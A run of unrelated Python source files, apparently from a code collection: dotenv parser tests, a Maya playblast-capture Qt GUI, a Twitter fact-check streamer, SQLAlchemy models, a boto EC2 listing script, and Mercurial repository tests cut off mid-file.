self.assertEquals(['db', 'asdf\\bob'], self.dotenv.parse_line('db = "asdf\\bob"', '#'))
def test_double_quote_in_single_quote(self):
# double quote inside single quotes are just regular characters
self.assertEquals(['db', 'asdf"bob'], self.dotenv.parse_line("db = 'asdf\"bob'", '#'))
def test_single_quote_in_double_quote(self):
# single quote inside double quotes are just regular characters
self.assertEquals(['db', "asdf'bob"], self.dotenv.parse_line('db = "asdf\'bob"', '#'))
|
import json
import logging
import os
import tempfile
import capture
import maya.cmds as cmds
from .vendor.Qt import QtCore, QtWidgets, QtGui
from . import lib
from . import plugin
from . import presets
from . import version
from . import tokens
from .accordion import AccordionWidget
log = logging.getLogger("Capture Gui")
class ClickLabel(QtWidgets.QLabel):
"""A QLabel that emits a clicked signal when clicked upon."""
clicked = QtCore.Signal()
def mouseReleaseEvent(self, event):
self.clicked.emit()
return super(ClickLabel, self).mouseReleaseEvent(event)
class PreviewWidget(QtWidgets.QWidget):
"""The playblast image preview widget.
Upon refresh it will retrieve the options through the function set as
`options_getter` and make a call to `capture.capture()` for a single
frame (playblasted) snapshot. The result is displayed as image.
"""
preview_width = 320
preview_height = 180
def __init__(self, options_getter, validator, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
# Add attributes
self.options_getter = options_getter
self.validator = validator
self.preview = ClickLabel()
self.preview.setFixedWidth(self.preview_width)
self.preview.setFixedHeight(self.preview_height)
tip = "Click to force a refresh"
self.preview.setToolTip(tip)
self.preview.setStatusTip(tip)
# region Build
self.layout = QtWidgets.QVBoxLayout()
self.layout.setAlignment(QtCore.Qt.AlignHCenter)
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
self.layout.addWidget(self.preview)
# endregion Build
# Connect widgets to functions
self.preview.clicked.connect(self.refresh)
def refresh(self):
"""Refresh the playblast preview"""
frame = cmds.currentTime(query=True)
# When playblasting outside of an undo queue it seems that undoing
# actually triggers a reset to frame 0. As such we sneak in the current
# time into the undo queue to enforce correct undoing.
cmds.currentTime(frame, update=True)
# check if plugin outputs are correct
valid = self.validator()
if not valid:
return
with lib.no_undo():
options = self.options_getter()
tempdir = tempfile.mkdtemp()
# override settings that are constants for the preview
options = options.copy()
options['filename'] = None
options['complete_filename'] = os.path.join(tempdir, "temp.jpg")
options['width'] = self.preview_width
options['height'] = self.preview_height
options['viewer'] = False
options['frame'] = frame
options['off_screen'] = True
options['format'] = "image"
options['compression'] = "jpg"
options['sound'] = None
fname = capture.capture(**options)
if not fname:
log.warning("Preview failed")
return
image = QtGui.QPixmap(fname)
self.preview.setPixmap(image)
os.remove(fname)
def showEvent(self, event):
"""Initialize when shown"""
self.refresh()
event.accept()
class PresetWidget(QtWidgets.QWidget):
"""Preset Widget
Allows the user to set preferences and create presets to load before
capturing.
"""
preset_loaded = QtCore.Signal(dict)
config_opened = QtCore.Signal()
id = "Presets"
label = "Presets"
def __init__(self, inputs_getter, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
self.inputs_getter = inputs_getter
layout = QtWidgets.QHBoxLayout(self)
layout.setAlignment(QtCore.Qt.AlignCenter)
layout.setContentsMargins(0, 0, 0, 0)
presets = QtWidgets.QComboBox()
presets.setFixedWidth(220)
presets.addItem("*")
# Icons
icon_path = os.path.join(os.path.dirname(__file__), "resources")
save_icon = os.path.join(icon_path, "save.png")
load_icon = os.path.join(icon_path, "import.png")
config_icon = os.path.join(icon_path, "config.png")
# Create buttons
save = QtWidgets.QPushButton()
save.setIcon(QtGui.QIcon(save_icon))
save.setFixedWidth(30)
save.setToolTip("Save Preset")
save.setStatusTip("Save Preset")
load = QtWidgets.QPushButton()
load.setIcon(QtGui.QIcon(load_icon))
load.setFixedWidth(30)
load.setToolTip("Load Preset")
load.setStatusTip("Load Preset")
config = QtWidgets.QPushButton()
config.setIcon(QtGui.QIcon(config_icon))
config.setFixedWidth(30)
config.setToolTip("Preset configuration")
config.setStatusTip("Preset configuration")
layout.addWidget(presets)
layout.addWidget(save)
layout.addWidget(load)
layout.addWidget(config)
# Make available for all methods
self.presets = presets
self.config = config
self.load = load
self.save = save
# Signals
self.save.clicked.connect(self.on_save_preset)
self.load.clicked.connect(self.import_preset)
self.config.clicked.connect(self.config_opened)
self.presets.currentIndexChanged.connect(self.load_active_preset)
self._process_presets()
def _process_presets(self):
"""Adds all preset files from preset paths to the Preset widget.
Returns:
None
"""
for presetfile in presets.discover():
self.add_preset(presetfile)
def import_preset(self):
"""Load preset files to override output values"""
path = self._default_browse_path()
filters = "Text file (*.json)"
dialog = QtWidgets.QFileDialog
filename, _ = dialog.getOpenFileName(self, "Open preference file",
path, filters)
if not filename:
return
# create new entry in combobox
self.add_preset(filename)
# read file
return self.load_active_preset()
def load_active_preset(self):
"""Load the active preset.
Returns:
dict: The preset inputs.
"""
current_index = self.presets.currentIndex()
filename = self.presets.itemData(current_index)
if not filename:
return {}
preset = lib.load_json(filename)
# Emit preset load signal
log.debug("Emitting preset_loaded: {0}".format(filename))
self.preset_loaded.emit(preset)
# Ensure we preserve the index after loading the changes
# for all the plugin widgets
self.presets.blockSignals(True)
self.presets.setCurrentIndex(current_index)
self.presets.blockSignals(False)
return preset
def add_preset(self, filename):
"""Add the filename to the preset list.
This also sets the index to the filename.
Returns:
None
"""
filename = os.path.normpath(filename)
if not os.path.exists(filename):
log.warning("Preset file does not exist: {0}".format(filename))
return
label = os.path.splitext(os.path.basename(filename))[0]
item_count = self.presets.count()
paths = [self.presets.itemData(i) for i in range(item_count)]
if filename in paths:
log.info("Preset is already in the "
"presets list: {0}".format(filename))
item_index = paths.index(filename)
else:
self.presets.addItem(label, userData=filename)
item_index = item_count
self.presets.blockSignals(True)
self.presets.setCurrentIndex(item_index)
self.presets.blockSignals(False)
return item_index
def _default_browse_path(self):
"""Return the current browse path for save/load preset.
If a preset is currently loaded it will use that specific path
otherwise it will go to the last registered preset path.
Returns:
str: Path to use as default browse location.
"""
current_index = self.presets.currentIndex()
path = self.presets.itemData(current_index)
if not path:
# Fallback to last registered preset path
paths = presets.preset_paths()
if paths:
path = paths[-1]
return path
def save_preset(self, inputs):
"""Save inputs to a file"""
path = self._default_browse_path()
filters = "Text file (*.json)"
filename, _ = QtWidgets.QFileDialog.getSaveFileName(self,
"Save preferences",
path,
filters)
if not filename:
return
with open(filename, "w") as f:
json.dump(inputs, f, sort_keys=True,
indent=4, separators=(',', ': '))
self.add_preset(filename)
return filename
def get_presets(self):
"""Return all currently listed presets"""
configurations = [self.presets.itemText(i) for
i in range(self.presets.count())]
return configurations
def on_save_preset(self):
"""Save the inputs of all the plugins in a preset."""
inputs = self.inputs_getter(as_preset=True)
self.save_preset(inputs)
def apply_inputs(self, settings):
path = settings.get("selected", None)
index = self.presets.findData(path)
if index == -1:
# If the last loaded preset still exists but wasn't on the
# "discovered preset paths" then add it.
if os.path.exists(path):
log.info("Adding previously selected preset explicitly: %s",
path)
self.add_preset(path)
return
else:
log.warning("Previously selected preset is not available: %s",
path)
index = 0
self.presets.setCurrentIndex(index)
def get_inputs(self, as_preset=False):
if as_preset:
# Don't save the current preset into the preset because
# that would just be recursive and make no sense
return {}
else:
current_index = self.presets.currentIndex()
selected = self.presets.itemData(current_index)
return {"selected": selected}
class App(QtWidgets.QWidget):
"""The main application in which the widgets are placed"""
# Signals
options_changed = QtCore.Signal(dict)
playblast_start = QtCore.Signal(dict)
playblast_finished = QtCore.Signal(dict)
viewer_start = QtCore.Signal(dict)
# Attributes
object_name = "CaptureGUI"
application_sections = ["config", "app"]
def __init__(self, title, parent=None):
QtWidgets.QWidget.__init__(self, parent=parent)
# Settings
# Remove pointer for memory when closed
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.settingfile = self._ensure_config_exist()
self.plugins = {"app": list(),
"config": list()}
self._config_dialog = None
self._build_configuration_dialog()
# region Set Attributes
title_version = "{} v{}".format(title, version.version)
self.setObjectName(self.object_name)
self.setWindowTitle(title_version)
self.setMinimumWidth(380)
# Set dialog window flags so the widget can be correctly parented
# to Maya main window
self.setWindowFlags(self.windowFlags() | QtCore.Qt.Dialog)
self.setProperty("saveWindowPref", True)
# endregion Set Attributes
self.layout = QtWidgets.QVBoxLayout()
self.layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(self.layout)
# Add accordion widget (Maya attribute editor style)
self.widgetlibrary = AccordionWidget(self)
self.widgetlibrary.setRolloutStyle(AccordionWidget.Maya)
# Add separate widgets
self.widgetlibrary.addItem("Preview",
PreviewWidget(self.get_outputs,
self.validate,
parent=self),
collapsed=True)
self.presetwidget = PresetWidget(inputs_getter=self.get_inputs,
parent=self)
self.widgetlibrary.addItem("Presets", self.presetwidget)
# add plug-in widgets
for widget in plugin.discover():
self.add_plugin(widget)
self.layout.addWidget(self.widgetlibrary)
# add standard buttons
self.apply_button = QtWidgets.QPushButton("Capture")
self.layout.addWidget(self.apply_button)
# default actions
self.apply_button.clicked.connect(self.apply)
# signals and slots
self.presetwidget.config_opened.connect(self.show_config)
self.presetwidget.preset_loaded.connect(self.apply_inputs)
self.apply_inputs(self._read_widget_configuration())
def apply(self):
"""Run capture action with current settings"""
valid = self.validate()
if not valid:
return
options = self.get_outputs()
filename = options.get("filename", None)
self.playblast_start.emit(options)
# The filename can be `None` when the
# playblast will *not* be saved.
if filename is not None:
# Format the tokens in the filename
filename = tokens.format_tokens(filename, options)
# expand environment variables
filename = os.path.expandvars(filename)
# Make relative paths absolute to the "images" file rule by default
if not os.path.isabs(filename):
root = lib.get_project_rule("images")
filename = os.path.join(root, filename)
# normalize (to remove double slashes and alike)
filename = os.path.normpath(filename)
options["filename"] = filename
# Perform capture and store returned filename with extension
options["filename"] = lib.capture_scene(options)
self.playblast_finished.emit(options)
filename = options["filename"] # get filename after callbacks
# Show viewer
viewer = options.get("viewer", False)
if viewer:
if filename and os.path.exists(filename):
self.viewer_start.emit(options)
lib.open_file(filename)
else:
raise RuntimeError("Can't open playblast because file "
"doesn't exist: {0}".format(filename))
return filename
def apply_inputs(self, inputs):
"""Apply all the settings of the widgets.
Arguments:
inputs (dict): input values per plug-in widget
Returns:
None
"""
if not inputs:
return
widgets = self._get_plugin_widgets()
widgets.append(self.presetwidget)
for widget in widgets:
widget_inputs = inputs.get(widget.id, None)
if not widget_inputs:
continue
widget.apply_inputs(widget_inputs)
def show_config(self):
"""Show the advanced configuration"""
# calculate center of main widget
geometry = self.geometry()
self._config_dialog.move(QtCore.QPoint(geometry.x()+30,
geometry.y()))
self._config_dialog.show()
def add_plugin(self, plugin):
"""Add an options widget plug-in to the UI"""
if plugin.section not in self.application_sections:
log.warning("{}'s section is invalid: "
"{}".format(plugin.label, plugin.section))
return
widget = plugin(parent=self)
widget.initialize()
widget.options_changed.connect(self.on_widget_settings_changed)
self.playblast_finished.connect(widget.on_playblast_finished)
# Add to plug-ins in its section
self.plugins[widget.section].append(widget)
# Implement additional settings depending on section
if widget.section == "app":
if not widget.hidden:
item = self.widgetlibrary.addItem(widget.label, widget)
# connect label change behaviour
widget.label_changed.connect(item.setTitle)
# Add the plugin in a QGroupBox to the configuration dialog
if widget.section == "config":
layout = self._config_dialog.layout()
# create group box
group_widget = QtWidgets.QGroupBox(widget.label)
group_layout = QtWidgets.QVBoxLayout(group_widget)
group_layout.addWidget(widget)
layout.addWidget(group_widget)
def validate(self):
"""Validate whether the outputs of the widgets are good.
Returns:
bool: Whether it's valid to capture the current settings.
"""
errors = list()
for widget in self._get_plugin_widgets():
widget_errors = widget.validate()
if widget_errors:
errors.extend(widget_errors)
if errors:
message_title = "%s Validation Error(s)" % len(errors)
message = "\n".join(errors)
QtWidgets.QMessageBox.critical(self,
message_title,
message,
QtWidgets.QMessageBox.Ok)
return False
return True
def get_outputs(self):
"""Return settings for a capture as currently set in the Application.
Returns:
dict: Current output settings
"""
# Get settings from widgets
outputs = dict()
for widget in self._get_plugin_widgets():
widget_outputs = widget.get_outputs()
if not widget_outputs:
continue
for key, value in widget_outputs.items():
# We merge dictionaries by updating them so we have
# the "mixed" values of both settings
if isinstance(value, dict) and key in outputs:
outputs[key].update(value)
else:
outputs[key] = value
return outputs
def get_inputs(self, as_preset=False):
"""Return the inputs per plug-in widgets by `plugin.id`.
Returns:
dict: The inputs per widget
"""
inputs = dict()
# Here we collect all the widgets from which we want to store the
# current inputs. This will be restored in the next session
# The preset widget is added to make sure the user starts with the
# previously selected preset configuration
config_widgets = self._get_plugin_widgets()
config_widgets.append(self.presetwidget)
for widget in config_widgets:
widget_inputs = widget.get_inputs(as_preset=as_preset)
if not isinstance(widget_inputs, dict):
log.debug("Widget inputs are not a dictionary "
"'{}': {}".format(widget.id, widget_inputs))
return
if not widget_inputs:
continue
inputs[widget.id] = widget_inputs
return inputs
def on_widget_settings_changed(self):
"""Set current preset to '*' on settings change"""
self.options_changed.emit(self.get_outputs)
self.presetwidget.presets.setCurrentIndex(0)
def _build_configuration_dialog(self):
"""Build a configuration to store configuration widgets in"""
dialog = QtWidgets.QDialog(self)
dialog.setWindowTitle("Capture - Preset Configuration")
QtWidgets.QVBoxLayout(dialog)
self._config_dialog = dialog
def _ensure_config_exist(self):
"""Create the configuration file if it does not exist yet.
Returns:
unicode: filepath of the configuration file
"""
userdir = os.path.expanduser("~")
capturegui_dir = os.path.join(userdir, "CaptureGUI")
capturegui_inputs = os.path.join(capturegui_dir, "capturegui.json")
if not os.path.exists(capturegui_dir):
os.makedirs(capturegui_dir)
if not os.path.isfile(capturegui_inputs):
config = open(capturegui_inputs, "w")
config.close()
return capturegui_inputs
def _store_widget_configuration(self):
"""Store all used widget settings in the local json file"""
inputs = self.get_inputs(as_preset=False)
path = self.settingfile
with open(path, "w") as f:
log.debug("Writing JSON file: {0}".format(path))
json.dump(inputs, f, sort_keys=True,
indent=4, separators=(',', ': '))
def _read_widget_configuration(self):
"""Read the stored widget inputs"""
inputs = {}
path = self.settingfile
if not os.path.isfile(path) or os.stat(path).st_size == 0:
return inputs
with open(path, "r") as f:
log.debug("Reading JSON file: {0}".format(path))
try:
inputs = json.load(f)
except ValueError as error:
log.error(str(error))
return inputs
def _get_plugin_widgets(self):
"""List all plug-in widgets.
Returns:
list: The plug-in widgets in *all* sections
"""
widgets = list()
for section in self.plugins.values():
widgets.extend(section)
return widgets
# override close event to ensure the input are stored
def closeEvent(self, event):
"""Store current configuration upon closing the application."""
self._store_widget_configuration()
for section_widgets in self.plugins.values():
for widget in section_widgets:
widget.uninitialize()
event.accept()
|
import logging
import requests
from twython import TwythonStreamer
import settings
class FactStreamer(TwythonStreamer):
def __init__(self, users, *args, **kwargs):
self.users = users
super().__init__(*args, **kwargs)
@property
def logger(self):
return logging.getLogger(str(self))
def on_success(self, data):
if 'text' in data:
tweet = data['text']
self.logger.info(tweet)
response = requests.get(
settings.FACTCHECK_API_URL,
params=dict(q=tweet, api_key=settings.FACTCHECK_API_KEY),
)
try:
conclusion = response.json()['matches'][0]['conclusion']
self.logger.info(conclusion)
except:
self.logger.warning('Could not get conclusion')
def on_error(self, status_code, data):
self.logger.warning(data)
def __str__(self):
return '<streamer.FactStreamer(tracking {} ID{})>'.format(
len(self.users),
's' if len(self.users) > 1 else '',
)
|
from sqlalchemy import BINARY, Column, Index, Integer, String, VARBINARY
from sqlalchemy import String, Unicode, ForeignKey
from sqlalchemy.orm import relationship, backref
from dbdatetime import dbdatetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class DoorkeeperExternalObject(Base):
__tablename__ = 'doorkeeper_externalobject'
__table_args__ = (
Index('key_full', 'applicationType', 'applicationDomain', 'objectType', 'objectID'),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
objectKey = Column(BINARY(12), nullable=False, unique=True)
applicationType = Column(Unicode(32), nullable=False)
applicationDomain = Column(Unicode(32), nullable=False)
objectType = Column(Unicode(32), nullable=False)
objectID = Column(Unicode(64), nullable=False)
objectURI = Column(Unicode(128))
importerPHID = Column(String)
properties = Column(Unicode, nullable=False)
viewPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class Edge(Base):
__tablename__ = 'edge'
__table_args__ = (
Index('key_dst', 'dst', 'type', 'src', unique=True),
Index('src', 'src', 'type', 'dateCreated', 'seq')
)
src = Column(String, primary_key=True, nullable=False)
type = Column(Integer, primary_key=True, nullable=False)
dst = Column(String, primary_key=True, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
seq = Column(Integer, nullable=False)
dataID = Column(Integer)
class EdgeData(Base):
__tablename__ = 'edgedata'
id = Column(Integer, primary_key=True)
data = Column(Unicode, nullable=False)
|
import sys
from boto.ec2.connection import EC2Connection
def instancedetails(ec2, instance_ids):
reservations = ec2.get_all_instances(instance_ids=instance_ids)
for reservation in reservations:
instances = reservation.instances
for instance in instances:
print "Instance {0}".format(instance.id)
print "State: {0}".format(instance.state)
print "Private IP: {0}".format(instance.private_ip_address)
print
if len(sys.argv) < 2:
print "Usage: {0} instance-id [instance-id ...]".format(sys.argv[0])
sys.exit(1)
ec2 = EC2Connection()
instancedetails(ec2, sys.argv[1:])
|
from __future__ import with_statement
import os
from vcs.backends.hg import MercurialRepository, MercurialChangeset
from vcs.exceptions import RepositoryError, VCSError, NodeDoesNotExistError
from vcs.nodes import NodeKind, NodeState
from vcs.tests.conf import TEST_HG_REPO, TEST_HG_REPO_CLONE, TEST_HG_REPO_PULL
from vcs.utils.compat import unittest
import mercurial.scmutil
mercurial.scmutil.rcpath()
if mercurial.scmutil._rcpath:
mercurial.scmutil._rcpath = mercurial.scmutil._rcpath[:1]
class MercurialRepositoryTest(unittest.TestCase):
def __check_for_existing_repo(self):
if os.path.exists(TEST_HG_REPO_CLONE):
self.fail('Cannot test mercurial clone repo as location %s already '
'exists. You should manually remove it first.'
% TEST_HG_REPO_CLONE)
def setUp(self):
self.repo = MercurialRepository(TEST_HG_REPO)
def test_wrong_repo_path(self):
wrong_repo_path = '/tmp/errorrepo'
self.assertRaises(RepositoryError, MercurialRepository, wrong_repo_path)
def test_unicode_path_repo(self):
self.assertRaises(VCSError,lambda:MercurialRepository(u'iShouldFail'))
def test_repo_clone(self):
self.__check_for_existing_repo()
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE,
src_url=TEST_HG_REPO, update_after_clone=True)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
# Checking hashes of changesets should be enough
for changeset in repo.get_changesets():
raw_id = changeset.raw_id
self.assertEqual(raw_id, repo_clone.get_changeset(raw_id).raw_id)
def test_repo_clone_with_update(self):
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE + '_w_update',
src_url=TEST_HG_REPO, update_after_clone=True)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
#check if current workdir was updated
self.assertEqual(os.path.isfile(os.path.join(TEST_HG_REPO_CLONE \
+ '_w_update',
'MANIFEST.in')), True,)
def test_repo_clone_without_update(self):
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE + '_wo_update',
src_url=TEST_HG_REPO, update_after_clone=False)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
self.assertEqual(os.path.isfile(os.path.join(TEST_HG_REPO_CLONE \
+ '_wo_update',
'MANIFEST.in')), False,)
def test_pull(self):
if os.path.exists(TEST_HG_REPO_PULL):
self.fail('Cannot test mercurial pull command as location %s '
'already exists. You should manually remove it first'
% TEST_HG_REPO_PULL)
repo_new = MercurialRepository(TEST_HG_REPO_PULL, create=True)
self.assertTrue(len(self.repo.revisions) > len(repo_new.revisions))
repo_new.pull(self.repo.path)
repo_new = MercurialRepository(TEST_HG_REPO_PULL)
self.assertTrue(len(self.repo.revisions) == len(repo_new.revisions))
def test_revisions(self):
# there are 21 revisions at bitbucket now
# so we can assume they would be available from now on
subset = set(['b986218ba1c9b0d6a259fac9b050b1724ed8e545',
'3d8f361e72ab303da48d799ff1ac40d5ac37c67e',
'6cba7170863a2411822803fa77a0a264f1310b35',
'56349e29c2af3ac913b28bde9a2c6154436e615b',
'2dda4e345facb0ccff1a191052dd1606dba6781d',
'6fff84722075f1607a30f436523403845f84cd9e',
'7d4bc8ec6be56c0f10425afb40b6fc315a4c25e7',
'3803844fdbd3b711175fc3da9bdacfcd6d29a6fb',
'dc5d2c0661b61928834a785d3e64a3f80d3aad9c',
'be90031137367893f1c406e0a8683010fd115b79',
'db8e58be770518cbb2b1cdfa69146e47cd481481',
'84478366594b424af694a6c784cb991a16b87c21',
'17f8e105dddb9f339600389c6dc7175d395a535c',
'20a662e756499bde3095ffc9bc0643d1def2d0eb',
'2e319b85e70a707bba0beff866d9f9de032aa4f9',
'786facd2c61deb9cf91e9534735124fb8fc11842',
'94593d2128d38210a2fcd1aabff6dda0d6d9edf8',
'aa6a0de05b7612707db567078e130a6cd114a9a7',
'eada5a770da98ab0dd7325e29d00e0714f228d09'
])
self.assertTrue(subset.issubset(set(self.repo.revisions)))
# check if we have the proper order of revisions
org = ['b986218ba1c9b0d6a259fac9b050b1724ed8e545',
'3d8f361e72ab303da48d799ff1ac40d5ac37c67e',
'6cba7170863a2411822803fa77a0a264f1310b35',
'56349e29c2af3ac913b28bde9a2c6154436e615b',
'2dda4e345facb0ccff1a191052dd1606dba6781d',
'6fff84722075f1607a30f436523403845f84cd9e',
'7d4bc8ec6be56c0f10425afb40b6fc315a4c25e7',
'3803844fdbd3b711175fc3da9bdacfcd6d29a6fb',
'dc5d2c0661b61928834a785d3e64a3f80d3aad9c',
'be90031137367893f1c406e0a8683010fd115b79',
'db8e58be770518cbb2b1cdfa69146e47cd481481',
'84478366594b424af694a6c784cb991a16b87c21',
'17f8e105dddb9f339600389c6dc7175d395a535c',
'20a662e756499bde3095ffc9bc0643d1def2d0eb',
'2e319b85e70a707bba0beff866d9f9de032aa4f9',
'786facd2c61deb9cf91e9534735124fb8fc11842',
'94593d2128d38210a2fcd1aabff6dda0d6d9edf8',
'aa6a0de05b7612707db567078e130a6cd114a9a7',
'eada5a770da98ab0dd7325e29d00e0714f228d09',
'2c1885c735575ca478bf9e17b0029dca68824458',
'd9bcd465040bf869799b09ad732c04e0eea99fe9',
'469e9c847fe1f6f7a697b8b25b4bc5b48780c1a7',
'4fb8326d78e5120da2c7468dcf7098997be385da',
'62b4a097164940bd66030c4db51687f3ec035eed',
'536c1a19428381cfea92ac44985304f6a8049569',
'965e8ab3c44b070cdaa5bf727ddef0ada980ecc4',
'9bb326a04ae5d98d437dece54be04f830cf1edd9',
'f8940bcb890a98c4702319fbe36db75ea309b475',
'ff5ab059786ebc7411e559a2cc309dfae3625a3b',
'6b6ad5f82ad5bb6190037671bd254bd4e1f4bf08',
'ee87846a61c12153b51543bf860e1026c6d3dcba', ]
self.assertEqual(org, self.repo.revisions[:31])
def test_iter_slice(self):
sliced = list(self.repo[:10])
itered = list(self.repo)[:10]
self.assertEqual(sliced, itered)
def test_slicing(self):
#4 1 5 10 95
for sfrom, sto, size in [(0, 4, 4), (1, 2, 1), (10, 15, 5),
(10, 20, 10), (5, 100, 95)]:
revs = list(self.repo[sfrom:sto])
self.assertEqual(len(revs), size)
self.assertEqual(revs[0], self.repo.get_changeset(sfrom))
self.assertEqual(revs[-1], self.repo.get_changeset(sto - 1))
def test_branches(self):
# TODO: Need more tests here
#active branches
self.assertTrue('default' in self.repo.branches)
self.assertTrue('stable' in self.repo.branches)
# closed
self.assertTrue('git' in self.repo._get_branches(closed=True))
self.assertTrue('web' in self.repo._get_branches(closed=True))
for name, id in self.repo.branches.items():
self.assertTrue(isinstance(
self.repo.get_changeset(id), MercurialChangeset))
def test_tip_in_tags(self):
# tip is always a tag
self.assertIn('tip', self.repo.tags)
def test_tip_changeset_in_tags(self):
tip = self.repo.get_changeset()
self.assertEqual(self.repo.tags['tip'], tip.raw_id)
def test_initial_changeset(self):
init_chset = self.repo.get_changeset(0)
self.assertEqual(init_chset.message, 'initial import')
self.assertEqual(init_chset.author,
'Marcin Kuzminski <marcin@python-blog.com>')
self.assertEqual(sorted(init_chset._file_paths),
sorted([
'vcs/__init__.py',
'vcs/backends/BaseRepository.py',
'vcs/backends/__init__.py',
])
)
self.assertEqual(sorted(init_chset._dir_paths),
sorted(['', 'vcs', 'vcs/backends']))
self.assertRaises(NodeDoesNotExistError, init_chset.get_node, path='foobar')
node = init_chset.get_node('vcs/')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.DIR)
node = init_chset.get_node('vcs')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.DIR)
node = init_chset.get_node('vcs/__init__.py')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.FILE)
def test_not_existing_changeset(self):
#rawid
self.assertRaises(RepositoryError, self.repo.get_changeset,
'abcd' * 10)
#shortid
self.assertRaises(RepositoryError, self.repo.get_changeset,
'erro' * 4)
#numeric
self.assertRaises(RepositoryError, self.repo.get_changeset,
self.repo.count() + 1)
# Small chance we ever get to this one
revision = pow(2, 30)
self.assertRaises(RepositoryError, self.repo.get_changeset, revision)
def test_changeset10(self):
chset10 = self.repo.get_changeset(10)
README = """===
VCS
===
Various Version Control System management abstraction layer for Python.
Introduction
------------
TODO: To be written...
"""
node = chset10.get_node('README.rst')
self.assertEqual(node.kind, NodeKind.FILE)
self.assertEqual(node.content, README)
class MercurialChangesetTest(unittest.TestCase):
def setUp(self):
self.repo = MercurialRepository(TEST_HG_REPO)
def _test_equality(self, changeset):
revision = changeset.revision
self.assertEqual(changeset, self.repo.get_changeset(revision))
def test_equality(self):
self.setUp()
revs = [0, 10, 20]
changesets = [self.repo.get_changeset(rev) for rev in revs]
for changeset in changesets:
self._test_equality(changeset)
def test_default_changeset(self):
tip = self.repo.get_changeset('tip')
self.assertEqual(tip, self.repo.get_changeset())
self.assertEqual(tip, self.repo.get_changeset(revision=None))
self.assertEqual(tip, list(self.repo[-1:])[0])
def test_root_node(self):
tip = self.repo.get_changeset('tip')
self.assertTrue(tip.root is tip.get_node(''))
def test_lazy_fetch(self):
"""
Test if changeset's nodes expands and are cached as we walk through
the revision. This test is somewhat hard to write as order of tests
is a key here. Written by running command after command in a shell.
"""
self.setUp()
chset = self.repo.get_changeset(45)
self.assertTrue(len(chset.nodes) == 0)
root = chset.root
self.assertTrue(len(chset.nodes) == 1)
self.assertTrue(len(root.nodes) == 8)
# accessing root.nodes updates chset.nodes
self.assertTrue(len(chset.nodes) == 9)
docs = root.get_node('docs')
# we haven't yet accessed anything new as docs dir was already cached
self.assertTrue(len(chset.nodes) == 9)
self.assertTrue(len(docs.nodes) == 8)
# accessing docs.nodes updates chset.nodes
self.assertTrue(len(chset.nodes) == 17)
self.assertTrue(docs is chset.get_node('docs'))
self.assertTrue(docs is root.nodes[0])
self.assertTrue(docs is root.dirs[0])
self.assertTrue(docs is chset.get_node('docs'))
def test_nodes_with_changeset(self):
self.setUp()
chset = self.repo.get_changeset(45)
root = chset.root
docs = root.get_node('docs')
self.assertTrue(docs is chset.get_node('docs'))
api = docs.get_node('api')
self.assertTrue(api is chset.get_node('docs/api'))
index = api.get_node('index.rst')
self.assertTrue(index is chset.get_node('docs/api/index.rst'))
self.assertTrue(index is chset.get_node('docs')\
.get_node('api')\
.get_node('index.rst'))
def test_branch_and_tags(self):
chset0 = self.repo.get_changeset(0)
self.assertEqual(chset0.branch, 'default')
self.assertEqual(chset0.tags, [])
chset10 = self.repo.get_changeset(10)
self.assertEqual(chset10.branch, 'default')
self.assertEqual(chset10.tags, [])
chset44 = self.repo.get_changeset(44)
self.assertEqual(chset44.branch, 'web')
tip = self.repo.get_changeset('tip')
self.assertTrue('tip' in tip.tags)
def _test_file_size(self, revision, path, size):
node = self.repo.get_changeset(revision).get_node(path)
self.assertTrue(node.is_file())
self.assertEqual(node.size, size)
def test_file_size(self):
to_check = (
(10, 'setup.py', 1068),
(20, 'setup.py', 1106),
(60, 'setup.py', 1074),
(10, 'vcs/backends/base.py', 2921),
(20, 'vcs/backends/base.py', 3936),
(60, 'vcs/backends/base.py', 6189),
)
for revision, path, size in to_check:
self._test_file_size(revision, path, size)
def test_file_history(self):
# we can only check if those revisions are present in the history
# as we cannot update this test every time file is changed
files = {
'setup.py': [7, 18, 45, 46, 47, 69, 77],
'vcs/nodes.py': [7, 8, 24, 26, 30, 45, 47, 49, 56, 57, 58, 59, 60,
61, 73, 76],
'vcs/backends/hg.py': [4, 5, 6, 11, 12, 13, 14, 15, 16, 21, 22, 23,
26, 27, 28, 30, 31, 33, 35, 36, 37, 38, 39, 40, 41, 44, 45, 47,
48, 49, 53, 54, 55, 58, 60, 61, 67, 68, 69, 70, 73, 77, 78, 79,
82],
}
for path, revs in files.items():
tip = self.repo.get_changeset(revs[-1])
node = tip.get_node(path)
node_revs = [chset.revision for chset in node.history]
self.assertTrue(set(revs).issubset(set(node_revs)),
"We assumed that %s is subset of revisions for which file %s "
"has been changed, and history of that node returned: %s"
% (revs, path, node_revs))
def test_file_annotate(self):
files = {
'vcs/backends/__init__.py':
{89: {'lines_no': 31,
'changesets': [32, 32, 61, 32, 32, 37, 32, 32, 32, 44,
37, 37, 37, 37, 45, 37, 44, 37, 37, 37,
32, 32, 32, 32, 37, 32, 37, 37, 32,
32, 32]},
20: {'lines_no': 1,
'changesets': [4]},
55: {'lines_no': 31,
'changesets': [32, 32, 45, 32, 32, 37, 32, 32, 32, 44,
37, 37, 37, 37, 45, 37, 44, 37, 37, 37,
32, 32, 32, 32, 37, 32, 37, 37, 32,
32, 32]}},
'vcs/exceptions.py':
{89: {'lines_no': 18,
